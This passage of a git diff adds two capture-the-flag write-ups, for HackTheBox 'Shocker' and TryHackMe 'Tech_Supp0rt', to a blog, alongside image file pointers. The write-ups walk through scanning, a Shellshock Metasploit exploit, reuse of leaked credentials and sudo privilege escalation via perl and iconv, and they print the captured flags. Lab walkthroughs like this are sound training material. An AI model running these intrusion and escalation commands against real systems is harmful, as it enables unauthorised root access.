diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.webp b/content/writeup-ctf/writeup-shocker-htb/featured.webp new file mode 100644 index 0000000..a3bdfe3 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0e42178fca2e3762c633f9a8b5df6659d656b73b1ad8e3cd0b818adf060d97a +size 36680 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.png b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png new file mode 100644 index 0000000..5dbcc62 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3439dc2ace422b07b48423a0a523c9f4f8a8e101df6bef72de7e16e99f10d13 +size 34714 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp new file mode 100644 index 0000000..eab3c0e --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f825975bbe348ab538a98dd00dc0eebfc6ee1179bb937063addfa3157b19bbd2 +size 34426 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.png b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png new file mode 100644 index 0000000..6440b5a --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3090b09708dcc43964d544c460ac0b9d5610cdf81e9d46201757279447eebd8b +size 87776 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp new file mode 100644 index 0000000..c96d6a8 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1199cdd94b66e4cea19976def683bca47223f9c18e1f8718810a4a5116284de8 +size 19818 
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.png b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png new file mode 100644 index 0000000..4cc01f5 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b039b64d3f2225f6143ac7858df5e4565d60d5b8656b4e600cfb58b4ea097a76 +size 57423 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp new file mode 100644 index 0000000..1d489e9 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a11e0d051291d45079c50c49a581ff3bedf22c5c8dc1ee125808a1b51d4af3c5 +size 60682 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.png b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png new file mode 100644 index 0000000..629b0f7 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:026e2d11e3d0a9867c9f6b0234e92c9a6337351bc30951256b5a5c717407ea30 +size 62023 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp new file mode 100644 index 0000000..3a1974b --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3daf306376bdf524a005a106c23308b0e68b989a9b88aa94d0794db36d2c9f80 +size 56220 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.png b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png new file mode 100644 index 0000000..06cfa66 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d03ab144c8dd1549e487d557cbfc4564c70e1da15b1cd315abb2abb0bc8c70c3 +size 56032 
diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp new file mode 100644 index 0000000..713f5b4 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b110685005fc831b67f1377040b6d8e9cc22f3b9a9cc445d5c9931c9a9018175 +size 46354 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.png b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png new file mode 100644 index 0000000..fbd14f2 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebf2734e41e05ea137dd62aa70a77eedf6d6243aab5424a69a2e8c61b8e61d7a +size 7585 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp new file mode 100644 index 0000000..65cd702 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2528d614165a82c7cd3342fe0a91e0dcb457806650c1b9b4a238f040d08802e5 +size 7832 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.png b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png new file mode 100644 index 0000000..60c11a5 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e448ab66ad4e004a7b19211b0639deacfab314e9286a120fae2c71dd9a01ff0 +size 16991 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp new file mode 100644 index 0000000..8ff6b78 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3a93b6839bbb73270b989d589bf38cf3a9a962e72d4a38a3cc77fc2035755dd +size 20116 
diff --git a/content/writeup-ctf/writeup-shocker-htb/index.md b/content/writeup-ctf/writeup-shocker-htb/index.md new file mode 100644 index 0000000..10379d1 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/index.md 
@@ -0,0 +1,91 @@ +--- +title: "Writeup - Shocker (HTB)" +date: 2022-05-12 +slug: "writeup-shocker-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Shocker](https://app.hackthebox.com/machines/Shocker) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 2222/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) + +![](img/image-2.webp) + +## Exploit + +At first I start by listing the files of the website. + +![](img/image-3.webp) + +We find a `cgi-bin` folder. + +![](img/image-4.webp) + +Listing the folder we find a file: `user.sh`. + + +```bash +Content-Type: text/plain + +Just an uptime test script + + 03:47:39 up 10 min, 0 users, load average: 0.00, 0.00, 0.00 +``` +10.10.10.56/cgi-bin/user.shBy searching a little bit I quickly find exploits to [cgi-bin](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). I choose to use the Metasploit module: `multi/http/apache_mod_cgi_bash_env_exec`. + +![](img/image-5.webp) + +By running the module I get a reverse shell. I start by upgrading this reverse shell : + +![](img/image-6.webp) + +Then I get the first flag. + + +```bash +shelly@Shocker:/usr/lib/cgi-bin$ cat /home/shelly/user.txt +cat /home/shelly/user.txt +2ec24e11320026d1e70ff3e16695b233 +``` +## Privilege escalation + +I start by checking the sudo permissions of my user. + +![](img/image-7.webp) + +Looking on GTFO, I find the page associated to [Perl](https://gtfobins.github.io/gtfobins/perl/#sudo). I use the following command to generate a SH session as root: + + +```bash +sudo perl -e 'exec "/bin/sh";' +``` +I can now recover the last flag. 
+ + +```bash +# id +id +uid=0(root) gid=0(root) groups=0(root) +# cat /root/root.txt +cat /root/root.txt +52c2715605d70c7619030560dc1ca467 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the machine to patch shellshock +- Do not allow root rights to run perl diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png new file mode 100644 index 0000000..5182a4c --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf368d780a820c74f328cb248dc31a9f5496a1ebba06f6a8bb22435973ece040 +size 150753 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp new file mode 100644 index 0000000..4276d45 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64c91634d5c952948e3cdfd18da822fdd5d24978a95292ff8941828da746dab +size 91950 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png new file mode 100644 index 0000000..7be85af --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51ddf88f1e832321be671296159fa840f35704a195e273dcf46d6add6207b0d5 +size 45343 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp new file mode 100644 index 0000000..7cbf5f7 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c813353bdf9cd990f71eaf7a56487b7b6a553080e5e64e2a92c24e1c3dc4b6bb +size 39976 
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png new file mode 100644 index 0000000..7970a17 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c41d8a769a61a6e9a7a6155eb0f2909899950e6e19cc6179f76342c51afa1c1d +size 43919 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp new file mode 100644 index 0000000..6a65019 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a67f7580f63c22b323432ccdfbb5f7522815cd86fdf773b029c670a461b8699 +size 33336 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png new file mode 100644 index 0000000..f0846fe --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a6cdbf0a8ed4ca417d416e438f90dfabb01464c126b22858e2f49177db61082 +size 28448 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp new file mode 100644 index 0000000..85f89bd --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3d7311cd6cb66913a4dba00fed96dbed2373bd62b402b204528c3e821e9f4d1 +size 24894 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png new file mode 100644 index 0000000..ab01456 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d87f6cb58053b1cd3084d49f3f38cbdaf512c19821e3c7be7b495891817772 +size 25605 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp new file mode 100644 index 0000000..dff9d1e --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8caa18a6721455d519d00817be2e0c1902bdb9e48e6988e7c9b97dce05ef3ba0 +size 27144 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png new file mode 100644 index 0000000..afd7e70 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82be2e63eca591071711c5db472f82ff765827e1cdd25aaaf09f171b4ef05faf +size 17964 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp new file mode 100644 index 0000000..b270134 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93f8e2303328980f8c67c133681ac05d7de45c3ea56acf51ead7a276a3b23dba +size 17212 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png new file mode 100644 index 0000000..a6ec94a --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9644dc96bc68d12be8d11fbb48624e83dd970d5040687eed004c1c07b598d46b +size 25737 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp new file mode 100644 index 0000000..9d0111a 
--- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9db82c066d2a9a7aa68679c327acd37cb062f72edb19b67ea31353397d1d3404 +size 26638 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png new file mode 100644 index 0000000..b457c00 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eca01066449bf06ffca64618f6fdcb0c45f6f4950505c63fa9a177b2f17fc566 +size 183081 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp new file mode 100644 index 0000000..25f43ee --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22dc25fac7efacf55f6838699c4c3aa233247d860acbfaa30bae26b4b87a53df +size 148392 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png new file mode 100644 index 0000000..8d33516 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0274bea9297bf02e7fb9bd6351f2a136a5a520c2c676b0e7024c3b0b43fd69a +size 65134 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp new file mode 100644 index 0000000..2dee235 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a4d34cf24004f60ba18d4b1502101702ef5f66b9b4a6c88e5a36efa2068b8dc +size 67682 
diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png new file mode 100644 index 0000000..5ac51ca --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d780b23ed884aa33c67754c34c378045199d8a3d69ded62210d4a7bde57c0c +size 284503 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp new file mode 100644 index 0000000..4aa1693 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea0c9b7d5b4d30a9b197859c053467ec286c4f2acb964581891116e4088484ce +size 94440 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png new file mode 100644 index 0000000..79634fe --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d05c1de3b46ccff3981535d1c1ddfa2eacca4374dc90cb5bca098c7e997fde5a +size 555403 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp new file mode 100644 index 0000000..25dbbd1 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf0c05aed715b5665ad1e756fa7ca6d8a81d7dbe20e71751863816196ebab616 +size 50762 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png new file mode 100644 index 0000000..70def27 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2a406af625832caf136239b77ee55c9a14753236108d4b00b8eec88c90962b2 +size 17462 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp new file mode 100644 index 0000000..1cbbcd4 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d0bafd66a22924a800fb696b80bcaa9e1c87f4f07cd335ff7beef11631cccf0 +size 17206 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png new file mode 100644 index 0000000..ad7d22f --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:689b1249eeacb521dec3f5b300be19873e594cefb1913c6f6ebdf555b772bdf5 +size 50998 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp new file mode 100644 index 0000000..529e713 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f12897db17120a2f241cabd0dc7a836856f65f14a247581647326d9f31de4944 +size 47376 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png new file mode 100644 index 0000000..ee7cfad --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0501034d8b8712737ef533ad03037797867d2a1338d713658120a4ba82e0ce23 +size 39530 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp new file mode 100644 index 0000000..0f16de5 --- /dev/null 
+++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e52403262515ceba79ce17891836066173bd5a806d8a179c1fb2c197dac65360 +size 20086 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png new file mode 100644 index 0000000..2e15dc1 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:224febff12ae24f60dbab76fd3059a1a1e68e53c6eb615fecd5c5d4626e416ff +size 342807 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp new file mode 100644 index 0000000..5d649f7 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3356a97284008884e0e7c53e55c312608feec893a6a9f6b84ebb6b332343290d +size 49922 diff --git a/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md new file mode 100644 index 0000000..2e7cc97 --- /dev/null +++ b/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md 
@@ -0,0 +1,162 @@ +--- +title: "Writeup - Tech_Supp0rt: 1 (THM)" +date: 2022-05-14 +slug: "writeup-techsupp0rt1-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.222.86 +``` +Four TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) +- 139/tcp : Samba (3.X - 4.X) +- 445/tcp : Samba  (3.X - 4.X) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +![](img/image-3.webp) + +We find 2 interesting files: + +![](img/image-4.webp) + +![](img/image-5.webp) + +After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously. + +![](img/image-6.webp) + +It works and I can get an `enter.txt` file. + + +```bash +GOALS +===== +1)Make fake popup and host it online on Digital Ocean server +2)Fix subrion site, /subrion doesn't work, edit from panel +3)Edit wordpress website + +IMP +=== +Subrion creds +|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula] +Wordpress creds +|-> +``` +In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting: + +![](img/image-7.webp) + +A `robots.txt` file but nothing special in it: + + +```bash +User-agent: * +Disallow: /backup/ +Disallow: /cron/? +Disallow: /front/ +Disallow: /install/ +Disallow: /panel/ +Disallow: /tmp/ +Disallow: /updates/ +``` +So I try to decrypt the password with CyberChef. 
As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr) + +![](img/image-8.webp) + +So I try to use this password. + +![](img/image-9.webp) + +Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell. + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ searchsploit subrion 4.2.1 +---------------------------------------------------------------------------------- --------------------------------- + Exploit Title | Path +---------------------------------------------------------------------------------- --------------------------------- +Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt +Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt +Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py +Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt +Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt +---------------------------------------------------------------------------------- --------------------------------- +Shellcodes: No Results +``` +Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command: + + +```bash +searchsploit -x php/webapps/49876.py > exploit.py +``` +Then I run it with the following command: + +![](img/image-10.webp) + +Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does: + +![](img/image-11.webp) + +Searching I find that the first flag is held by the user `scamsite`. 
So I go to the wordpress folder to see if I can find information in the configuration files: + + +```bash +[...] +/** MySQL database username */ +define( 'DB_USER', 'support' ); + +/** MySQL database password */ +define( 'DB_PASSWORD', 'ImAScammerLOL!123!' ); + +/** MySQL hostname */ +define( 'DB_HOST', 'localhost' ); +[...] +``` +So I try to connect via SSH with this password and it works. So I can recover the first flag. + +![](img/image-12.webp) + +## Privilege escalation + +I start by looking at the sudo permissions: + +![](img/image-13.webp) + +My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo). + +There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH: + + +```bash +echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys + +``` +I now have a root shell and can retrieve the last flag. + +![](img/image-14.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow anonymous access on an SMB server +- Do not leave passwords in accessible files +- Do not leave executable applications with sudo root if not necessary diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.png b/content/writeup-ctf/writeup-timelapse-htb/featured.png new file mode 100644 index 0000000..bb6cf71 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0596b3be91f30df48ce48d6167235e7c484e7c190b0a632c378746b979f4e1cd +size 355802 diff --git a/content/writeup-ctf/writeup-timelapse-htb/featured.webp b/content/writeup-ctf/writeup-timelapse-htb/featured.webp new file mode 100644 index 0000000..4e5bada --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/featured.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21041abf5dfcedb3c8db8463d858558d4d7aaa2eaf2983886a34a5cae7108293 +size 31990 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png new file mode 100644 index 0000000..b323f90 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9233097338bd4e0b245b89de23a20c87bea9395db2e27d27e6aa84b047ab2021 +size 116145 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp new file mode 100644 index 0000000..35bf3c4 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6469990e67543bf3a7c0f8249ca5c5b7d806b3e12372ae1c910793e2d99eabc4 +size 105246 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png new file mode 100644 index 0000000..d36482e --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7651aeb109a1258becbfdde305b76d54436bc87674a71fea83cd476eff521dee +size 10533 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp new file mode 100644 index 0000000..7be2b80 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2460d9e67ed60abe2359b5b379bd120ee1949968b7bf6767da5b43d9447c44da +size 18054 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png new file mode 100644 index 0000000..c1ec29c --- /dev/null 
